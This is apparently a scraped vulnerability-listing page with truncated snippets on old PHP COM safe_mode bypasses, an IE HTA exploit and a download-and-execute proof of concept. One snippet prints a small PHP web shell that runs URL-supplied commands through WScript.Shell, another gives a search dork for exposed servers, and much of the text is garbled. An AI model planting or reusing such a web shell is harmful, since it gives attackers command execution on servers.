CVE-2007-5653

The Component Object Model COM functions in PHP 5.x on Windows do not follow safemode and disablefunctions restrictions, which allows context-dependent attackers to bypass intended limitations, as demonstrated by executing objects with the kill bit set in the corresponding ActiveX control...

CVE-2007-5653

The Component Object Model COM functions in PHP 5.x on Windows do not follow safemode and disablefunctions restrictions, which allows context-dependent attackers to bypass intended limitations, as demonstrated by executing objects with the kill bit set in the corresponding ActiveX control...

PHP 5.x COM functions safe_mode and disable_function bypass

No description provided by source. ?php //PHP 5.x COM functions safemode and disablefunction bypass //author: shinnai //mail: shinnaiatautisticidotorg //site: http://shinnai.altervista.org //dork: intitle:phpinfo intext:"php version" +windows thanks to rgod...

CVE-2007-1382

The PHP COM extensions for PHP on Windows systems allow context-dependent attackers to execute arbitrary code via a WScript.Shell COM object, as demonstrated by using the Run method of this object to execute cmd.exe, which bypasses PHP's safe mode...

Code injection

The PHP COM extensions for PHP on Windows systems allow context-dependent attackers to execute arbitrary code via a WScript.Shell COM object, as demonstrated by using the Run method of this object to execute cmd.exe, which bypasses PHP's safe mode...

CVE-2007-1382

The CVE-2007-1382 entry concerns the PHP COM extensions for PHP on Windows. The vulnerability arises when a context-dependent attacker uses a WScript.Shell COM object’s Run method to execute cmd.exe, bypassing PHP’s Safe Mode and enabling arbitrary code execution. The affected component is the PH...

PHP COM extension safe_mode protection bypass

WScript.Shell COM object allows execution of any commands...

under windows the use of Wscript. Shell to run the command cmd. php-vulnerability warning-the black bar safety net

From PHPSPY2006 pick out a small program: cmd.php ? php $phpwsh=new COM"Wscript. Shell" or die"Create Wscript. Shell Failed!"; $exec=$phpwsh-exec"cmd.exe /c ".$ GET'cmd'.""; $stdout = $exec-StdOut; $stroutput = $stdout-ReadAll; echo $stroutput; ?& gt; Usage:...

Microsoft Windows - 'HTA' Script Execution (MS05-016)

/ Changed date in db to place it on the main page instead of it being bumped off /str0ke / /++ MS05-016 POC Made By ZwelL [email protected] 2005.4.13 All information from : http://www.securityfocus.net/archive/1/395563/2005-04-10/2005-04-16/0 You need make a .hta file to use it. Like: set...

IE Shell URI Download and Execute, POC

Hello; Code is based on http://www.securityfocus.com/archive/1/367878 POC by Jelmer message. I just added a new feature "download" and then execute application. Also I use Wscript.Shell in Javascript instead of Shell.Application. 1- copy IPADDRESSNULLSHAREDFOLDERbad.exe stealth 2- Wait for downlo...